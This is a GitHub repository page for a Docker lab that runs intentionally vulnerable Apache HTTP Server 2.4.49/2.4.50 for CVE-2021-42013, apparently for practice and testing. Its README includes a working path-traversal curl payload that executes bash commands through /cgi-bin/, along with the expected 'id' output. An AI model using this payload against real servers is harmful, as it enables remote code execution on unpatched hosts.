Skip to content
/ CVE-2021-42013 Public

Vulnerable configuration Apache HTTP Server version 2.4.49/2.4.50

0 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

12345qwert123456/CVE-2021-42013

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
2.4.49
2.4.49
 
 
2.4.50
2.4.50
 
 
.gitattributes
.gitattributes
 
 
README.md
README.md
 
 

Repository files navigation

CVE-2021-42013 Vulnerable service

Installation

Several options:

1. Docker container

docker run -d -p 8080:80 12345qwert123456/apache_2_4_50_cve-2021-42013

2. Dockerfile

git clone https://github.com/12345qwert123456/CVE-2021-42013.git

cd CVE-2021-42013-Vulnerable-service/2.4.50

docker build -t apache_2_4_50_cve-2021-42013 .

docker run -d -p 8080:80 apache_2_4_50_cve-2021-42013

Explotation

Command:

curl --path-as-is -d "echo Content-Type: text/plain; echo; id" "http://127.0.0.1:8080/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/bash"

Expected output:

uid=1(daemon) gid=1(daemon) groups=1(daemon)

About

Vulnerable configuration Apache HTTP Server version 2.4.49/2.4.50

Topics

docker apache http-server rce vulnerability cve lfi cve-2021-42013

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases 1

Docker Image Latest
Nov 21, 2022

Packages

No packages published

Languages